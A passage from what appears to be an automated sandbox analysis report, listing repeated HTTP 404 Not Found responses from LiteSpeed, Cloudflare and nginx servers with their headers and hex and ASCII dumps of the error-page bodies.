67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0vilVpx40x61Ge10nFDxY7ev4DGRdez%2BsvnRawnbjux7c6%2BETtY4dcE6UgMYxG%2BF7OMUdQiFHeRMIQpu%2F1SwTQwXpvq0dJh2%2F50YRDKl4YpHSKoGvwECirpTNLRvBaoP9f18"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c3f2896cfba42d7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EZx2ihxGdHIqA2AtrHtjPuWTSu1gx6QacJUPtVkIv0kYDSfOWXuP4XVdWyGuZioI6vJGbyQFVvxO19hKk99fkz7odlFbJA3qFGQ82ZsvWZ8e4E446nFbW2X57E9NqDxgpbTu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c3f28a6ad0d43b3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 a9 14 d9 4d 11 5b 21 86 Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FTPFsx%2BVEncxtcn2fF8bUNjyJdX%2FokuNVp8xbBaCAFow10tzPvMDQJDJp3CfkMtLjk93fbeUbTQSBBovQRCN21EkoBmPfPLXWh5WSPK0pXTsoCD5bRHMHzJCM%2B%2FLdkXTdGP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c3f28b6bc4a7d06-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttT8K7JoGOXZsZvmzwVA2OgfsdzDKa2OkCicYGYlU1Mhk3LGGcIt0QMR9Hk4dUeCUlWETQH04pkrDWAvZy%2B%2FpyoC9cy159a0FxshnXJ5SUyckxv08bjoFzT4oSikOoyau%2FQ7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c3f28c6783f8cc8-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; t
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:32:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:32:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 